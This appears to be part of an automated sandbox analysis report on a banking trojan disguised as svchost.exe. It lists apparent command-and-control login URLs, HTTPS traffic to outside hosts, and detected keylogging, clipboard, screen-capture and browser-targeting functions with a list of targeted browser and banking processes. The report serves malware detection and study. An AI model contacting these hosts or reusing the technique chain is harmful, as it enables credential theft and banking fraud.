Source: svchost.exe, 00000002.00000003.1868222111.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743301063.00000000033F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1764721323.0000000005AAD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529894958.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2686660345.0000000000848000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080135300.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1754662746.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735224157.0000000005A6F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789844614.000000000333F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1563997171.00000000008FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580889706.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1943197013.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1586990670.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1738014937.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2609404650.0000000005B8F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1764529443.0000000005A6F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845987393.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1908395491.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1737220209.0000000005A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lysyvan.com/login.php
Source: svchost.exe, 00000002.00000003.1737220209.0000000005A61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1739889236.0000000005A61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522799533.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711149824.0000000003386000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529894958.00000000033F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735224157.0000000005A61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559995578.0000000005A1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522451091.000000000333A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1734298880.0000000005A61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735224157.0000000005A6F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1732988011.0000000005A61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595511474.0000000005A1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693475153.000000000CCAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1764529443.0000000005A6F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498796821.0000000000860000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523047379.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1714130873.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1520950909.000000000333A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1737220209.0000000005A6F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1732988011.0000000005A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qegyhig.com/login.php
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53549
Source: unknownNetwork traffic detected: HTTP traffic on port 63212 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53543
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53540
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53531 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 61824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53554 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61823
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 53540 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63213 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63211 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53554
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53531
Source: unknownNetwork traffic detected: HTTP traffic on port 61823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53549 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63212
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63211
Source: unknownNetwork traffic detected: HTTP traffic on port 53543 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63213
Source: unknownHTTPS traffic detected: 75.2.71.199:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:63211 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:63213 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:61823 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:61824 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53540 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53543 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53554 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Contains functionality to capture and log keystrokes
Source: C:\Windows\apppatch\svchost.exeCode function: [tab]2_2_02C81B80
Source: C:\Windows\apppatch\svchost.exeCode function: [del]2_2_02C81B80
Source: C:\Windows\apppatch\svchost.exeCode function: [del]2_2_02C81B80
Source: C:\Windows\apppatch\svchost.exeCode function: [ins]2_2_02C81B80
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C81E60 memset,GlobalLock,GetCurrentThreadId,GetGUIThreadInfo,GetOpenClipboardWindow,GetActiveWindow,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GlobalUnlock,GlobalUnlock,2_2_02C81E60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C78630 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,GetLastError,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_02C78630
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_01418630 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,GetLastError,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_01418630
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_01388630 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,GetLastError,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_01388630
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03218630 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,GetLastError,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_03218630
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C93950 GetDesktopWindow,GetWindowDC,CreateCompatibleDC,PathAddBackslashA,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateDIBSection,SelectObject,BitBlt,GetDesktopWindow,GetDC,GetProcessHeap,HeapAlloc,memset,GetDIBits,GetDIBits,WriteFile,ReleaseDC,2_2_02C93950
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C81B80 memset,GetProcessHeap,HeapAlloc,memset,GetProcessHeap,HeapValidate,GetProcessHeap,HeapReAlloc,GetKeyboardState,ToAscii,2_2_02C81B80

E-Banking Fraud

barindex
Checks if browser processes are running
Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|2_2_02C86370
Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|2_2_02C86370
Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|2_2_02C86370
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe2_2_02C85890
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe2_2_02C85890
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe2_2_02C85890
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe2_2_02C85890
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe2_2_02C85890
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe2_2_02C85890
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|2_2_02C73510
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|2_2_02C73510
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|2_2_02C73510
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe5_2_01425890
